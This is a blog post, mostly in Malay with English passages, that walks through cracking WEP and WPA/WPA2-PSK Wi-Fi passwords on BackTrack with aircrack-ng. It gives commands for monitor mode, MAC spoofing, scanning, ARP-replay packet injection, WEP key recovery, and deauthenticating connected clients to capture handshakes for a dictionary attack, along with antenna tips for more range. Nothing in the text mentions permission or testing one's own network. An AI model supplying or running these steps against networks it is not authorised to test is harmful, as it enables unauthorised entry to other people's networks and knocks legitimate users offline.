open = memang openlah
wep = ada password tapi boleh hack
wep2/psk = ada password tapi sukar sikit nak hack
oleh itu disini kita gunakan os backtrack
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data
setup airmon-ng
ok mula - mula test command di bawah
iwconfig (untuk melihat status wireless card itu sama ada wlan0,wlan1 dan dll)
airmon-ng start wlan0 (untuk set monitor mode, nama card ini akan digunakan untuk proses aircrack nanti)
cth :wlan0
Other related Linux commands:
ifconfig (to list available network interfaces, my network card is listed as wlan0)
ifconfig wlan0 down (to stop the specified network card)
ifconfig wlan0 hw ether 00:11:22:33:44:55 (change the MAC address of a NIC - can even simulate the MAC of an associated client. NIC should be stopped before chaning MAC address)
iwconfig wlan0 mode monitor (to set the network card in monitor mode)
ifconfig wlan0 up (to start the network card)
iwconfig - similar to ifconfig, but dedicated to the wireless interfaces.
Recon Stage (airodump-ng)
airodump-ng mon0: command ini digunakan untuk scan; "mon0" itu adalah nama wireless card yg digunakan.kalau wlan0 gunelah "airodump-ng wlan0"
gambar diatas menunjukkan BSSID , PWR , BEACONS , CH ,ESSID
kat sini kite perlukan BSSID,CH,ESSID untuk proses seterusnye kerana:
BSSID = menunjukkan mac address modem wireless tersebut
CH = channel yg digunakan
ESSID = nama wireless yg digunakan
Increase Traffic (aireplay-ng) - optional step for WEP cracking
ni command die
aireplay-ng -3 -b 00:0F:CC:7D:5A:74 -h 00:14:A5:2F:A7:DE -x 50 wlan0
-3 --> this specifies the type of attack, in our case ARP-request replay
-b ..... --> MAC address of access point
-h ..... --> MAC address of associated client from airodump
-x 50 --> limit to sending 50 packets per second
wlan0 --> our wireless network interface
notes:
To test whether your nic is able to inject packets, you may want to try: aireplay-ng -9 wlan0. You may also want to read the information available -here-.
To see all available replay attacks, type just: aireplay-ng
bile dah proses aireplay ini berjaya terdapat satu file.cap telah di save
Crack WEP (aircrack-ng)
WEP cracking is a simple process, only requiring collection of enough data to then extract the key and connect to the network. You can crack the WEP key while capturing data. In fact, aircrack-ng will re-attempt cracking the key after every 5000 packets.
o attempt recovering the WEP key, in a new terminal window, type:
aircrack-ng data*.cap (assuming your capture file is called data...cap, and is located in the same directory)
Notes:
If your data file contains ivs/packets from different access points, you may be presented with a list to choose which one to recover.
Usually, between 20k and 40k packets are needed to successfully crack a WEP key. It may sometimes work with as few as 10,000 packets with short keys.
Crack WPA or WPA2 PSK (aircrack-ng)
WPA, unlike WEP rotates the network key on a per-packet basis, rendering the WEP method of penetration useless. Cracking a WPA-PSK/WPA2-PSK key requires a dictionary attack on a handshake between an access point and a client. What this means is, you need to wait until a wireless client associates with the network (or deassociate an already connected client so they automatically reconnect). All that needs to be captured is the initial "four-way-handshake" association between the access point and a client. Essentially, the weakness of WPA-PSK comes down to the passphrase. A short/weak passphrase makes it vulnerable to dictionary attacks.
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. This can be obtained using the same technique as with WEP in step 3 above, using airodump-ng.
You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_IP is the MAC address of the access point, MAC_Client is the MAC address of an associated client, mon0 is your wireless NIC).
The command output looks something like:
12:34:56 Waiting for beakon frame (BSSID: 00:11:22:33:44:55:66) on channel 6
12:34:56 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55:66] [ 5:62 ACKs]
Note the last two numbers in brackets [ 5:62 ACKs] show the number of acknowledgements received from the client NIC (first number) and the AP (second number). It is important to have some number greater than zero in both. If the first number is zero, that indicates that you're too far from the associated client to be able to send deauth packets to it, you may want to try adding a reflector to your antenna (even a simple manilla folder with aluminum foil stapled to it works as a reflector to increase range and concentrate the signal significantly), or use a larger antenna.
No comments:
Post a Comment